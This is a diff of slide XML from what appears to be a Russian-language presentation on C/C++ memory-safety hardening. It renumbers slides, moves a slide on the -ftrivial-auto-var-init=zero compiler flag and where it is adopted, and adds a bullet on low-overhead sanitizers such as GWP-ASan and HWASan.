+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>atexit</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> handlers)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -17053,7 +17319,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide52.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide53.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17263,7 +17529,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide53.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide54.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17347,7 +17613,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide54.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide55.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17497,7 +17763,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide55.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide56.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17974,7 +18240,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide56.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide57.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18273,7 +18539,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide57.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide58.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18975,7 +19241,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide58.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide59.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19196,279 +19462,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="979091236"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide59.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в компиляторе в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Скрытый флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>initiall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в пакетах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дискуссия в трекере </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>#1972043</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Chromium #</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>40633061</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не включён в Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Trivial Auto Var Init Experiments</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>найти </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>buildflags</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android user</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>- и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>kernelspace</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="sv-SE" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>System hardening in Android 11</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716798563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19560,7 +19553,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack/heap/static overflow, double free, use-after-free, etc.</a:t>
+              <a:t>Stack/heap/static overflow, double free, use-after-free/return, etc.</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -19585,6 +19578,25 @@
               <a:t>тестирования</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Особенно варианты с низкими накладными расходами </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(GWP-Asan, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>HWASan</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -19797,6 +19809,279 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в компиляторе в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Скрытый флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>initiall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в пакетах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Дискуссия в трекере </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>#1972043</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Chromium #</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>40633061</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока не включён в Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Trivial Auto Var Init Experiments</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>найти </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>buildflags</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>- и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>kernelspace</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="sv-SE" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>System hardening in Android 11</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716798563"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide61.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FC243D-B202-4F31-A4DF-4AF817233640}"/>
               </a:ext>
             </a:extLst>
@@ -19859,7 +20144,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide61.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide62.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20260,7 +20545,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide62.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide63.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20603,7 +20888,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide63.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide64.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21030,7 +21315,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide64.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide65.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21369,7 +21654,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide65.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide66.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21453,7 +21738,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide66.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide67.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21799,7 +22084,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide67.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide68.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22007,7 +22292,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide68.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide69.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22118,290 +22403,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1271915155"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide69.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968FA426-DD3C-438B-A365-8664F144CD4B}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как использовать</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A153389F-DAD8-493A-B583-3F5F530780E3}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Обычно для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC/Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>отключают</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
